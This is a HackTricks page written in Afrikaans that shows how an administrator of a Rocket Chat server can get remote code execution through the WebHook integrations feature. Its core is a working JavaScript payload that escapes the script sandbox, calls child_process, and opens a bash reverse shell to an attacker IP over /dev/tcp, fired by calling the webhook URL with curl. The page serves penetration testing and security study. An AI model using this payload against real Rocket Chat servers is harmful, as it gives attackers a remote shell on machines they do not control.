Rocket Chat

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

RCE

As jy admin binne Rocket Chat is, kan jy RCE kry.

Gaan na Integrasies en kies Nuwe Integrasie en kies enige: Inkomende WebHook of Uitgaande WebHook.
/admin/integrations/incoming

Volgens die docs, gebruik albei ES2015 / ECMAScript 6 (basies JavaScript) om die data te verwerk. So kom ons kry 'n rev shell vir javascript soos:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

Konfigureer die WebHook (die kanaal en pos as gebruikersnaam moet bestaan):

Konfigureer WebHook-skrip:

Stoor veranderinge
Kry die gegenereerde WebHook-URL:

Roep dit aan met curl en jy behoort die rev shell te ontvang

Ondersteun HackTricks

Kyk na die subskripsieplanne!
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousPython NextSpecial HTTP headers

Last updated 2 months ago